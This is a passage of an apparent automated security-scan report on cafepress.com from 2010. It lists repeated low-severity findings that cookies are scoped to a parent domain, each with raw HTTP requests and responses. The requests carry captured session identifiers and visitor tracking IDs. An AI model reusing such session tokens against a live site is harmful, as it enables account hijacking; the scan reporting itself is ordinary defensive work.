__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59426
Date: Sun, 26 Dec 2010 13:47:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.11. http://www.cafepress.com/+bumper-stickers

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+bumper-stickers

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers carrying a domain= attribute in the response). The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59721
Date: Sun, 26 Dec 2010 13:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.12. http://www.cafepress.com/+buttons

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+buttons

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59616
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.13. http://www.cafepress.com/+calendars

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+calendars

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 57707
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.14. http://www.cafepress.com/+clocks

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+clocks

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59318
Date: Sun, 26 Dec 2010 13:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.15. http://www.cafepress.com/+coasters

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+coasters

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59255
Date: Sun, 26 Dec 2010 13:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+eat_sleep_game_light_tshirt,299007536

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 93204
Date: Sun, 26 Dec 2010 13:49:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.17. http://www.cafepress.com/+framed-prints

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+framed-prints

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+framed-prints HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 